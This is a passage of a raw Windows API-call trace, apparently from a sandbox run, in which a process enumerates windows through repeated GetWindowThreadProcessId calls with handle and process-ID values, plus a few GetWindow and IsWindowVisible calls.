	[0613.820] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xe34
	[0613.820] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xea4
	[0613.820] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x514
	[0613.821] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xe48
	[0613.821] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xbc8
	[0613.821] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xdf8
	[0613.821] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x318
	[0613.821] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xcac
	[0613.821] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x8bc
	[0613.821] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xf9c
	[0613.821] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xf48
	[0613.821] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xe40
	[0613.821] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xecc
	[0613.822] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xeb8
	[0613.822] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xe80
	[0613.822] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xe98
	[0613.823] GetWindow (hWnd=0x10404, uCmd=0x4) returned 0x0
	[0613.823] IsWindowVisible (hWnd=0x10404) returned 0
	[0613.823] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xe60
	[0613.824] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xee4
	[0613.824] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xf00
	[0613.824] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xdf0
	[0613.824] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xe1c
	[0613.824] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xdd0
	[0613.824] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xd94
	[0613.824] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xd74
	[0613.824] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xd00
	[0613.825] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xcd8
	[0613.825] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xc84
	[0613.825] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xca4
	[0613.825] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xc64
	[0613.825] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xc24
	[0613.825] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xb84
	[0613.825] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xbac
	[0613.825] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x384
	[0613.826] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xab8
	[0613.826] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x33c
	[0613.826] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xa44
	[0613.826] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xa64
	[0613.826] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x8a8
	[0613.826] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xaf0
	[0613.826] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x88c
	[0613.826] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xb04
	[0613.827] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x910
	[0613.827] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x230
	[0613.827] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xac0
	[0613.827] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xab4
	[0613.827] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xaac
	[0613.827] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x3d0
	[0613.827] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x978
	[0613.827] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xa7c
	[0613.827] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x59c
	[0613.828] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xa88
	[0613.828] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xa6c
	[0613.828] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xa68
	[0613.828] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x9f8
	[0613.828] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xa04
	[0613.828] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x924
	[0613.828] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x8dc
	[0613.828] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x7dc
	[0613.829] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x768
	[0613.829] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x764
	[0613.829] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x820
	[0613.829] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x810
	[0613.829] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x794
	[0613.829] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x83c
	[0613.829] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x7ac
	[0613.829] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xb44
	[0613.830] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xb5c
	[0613.830] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x838
	[0613.830] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.830] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.830] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.830] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.830] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.830] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.831] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.831] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.831] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x818
	[0613.831] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x5b8
	[0613.831] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x494
	[0613.831] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1ec
	[0613.831] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x440
	[0613.831] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x7e8
	[0613.832] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x730
	[0614.928] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x2c8
	[0618.608] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x31c
	[0618.614] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x330
	[0619.901] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x128
	[0619.906] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x5c8
	[0619.909] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x6f8
	[0619.912] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x358
	[0619.914] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x73c
	[0619.915] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xb0
	[0621.432] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x250
	[0621.437] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x240
	[0621.441] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x790
	[0621.444] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x61c
	[0621.445] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x540
	[0622.788] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x538
	[0622.794] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x568
	[0622.797] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x538
	[0622.800] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x568
	[0622.803] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x538
	[0622.804] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x540
	[0622.806] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x540
	[0623.860] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x57c
	[0624.673] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x460
	[0624.682] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x554
	[0625.637] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0625.642] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x528
	[0626.929] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0627.859] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0629.495] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0629.714] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x79c
	[0629.721] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0629.724] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4e0
	[0629.727] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0629.733] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x460
	[0631.469] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x460
	[0631.469] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x44c
	[0631.470] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x778
	[0631.470] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x460
	[0631.470] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x558
	[0631.470] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0631.470] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0631.470] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1bb4
	[0631.470] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x10bc
	[0631.470] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1b50
	[0631.470] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x14b4
	[0631.471] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x149c
	[0631.471] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x14a8
	[0631.471] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1490
	[0631.471] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x14a4
	[0631.471] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x148c
	[0631.471] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1458
	[0631.471] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1b4c
	[0631.471] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1b3c
	[0631.471] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x19bc
	[0631.471] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x199c
	[0631.471] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1998
	[0631.472] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1994
	[0631.472] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1990
	[0631.472] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1984
	[0631.472] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x197c
	[0631.472] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1978
	[0631.472] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1824
	[0631.472] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1088
	[0631.472] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1908
	[0631.472] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x18cc
	[0631.472] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x18d0
	[0631.473] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1840
	[0631.473] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x10c4
	[0631.473] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x128c
	[0631.473] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x16e8
	[0631.473] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x16cc
	[0631.473] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x274
	[0631.473] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x10e0
	[0631.473] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x10cc
	[0631.473] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x10c0
	[0631.473] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x10d0
	[0631.474] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1198
	[0631.474] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1080
	[0631.474] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1074
	[0631.474] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x106c
	[0631.474] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1474
	[0631.474] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1414
	[0631.474] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xbd0
	[0631.474] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x550
	[0631.474] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xa38
	[0631.474] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x16d0
	[0631.475] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x16d4
	[0631.475] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x15bc
	[0631.475] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x15a0
	[0631.475] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x159c
	[0631.475] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1598
	[0631.475] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1594
	[0631.475] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1590
	[0631.475] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x158c
	[0631.475] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1588
	[0631.476] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1584
	[0631.476] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1580
	[0631.476] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x157c
	[0631.476] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1488
	[0631.476] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1404
	[0631.476] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x11b8
	[0631.476] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xbd4
	[0631.476] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xe0c
	[0631.476] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xd30
	[0631.476] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xe70
	[0631.477] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x13b8
	[0631.477] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xe20
	[0631.477] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xe2c
	[0631.477] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xe00
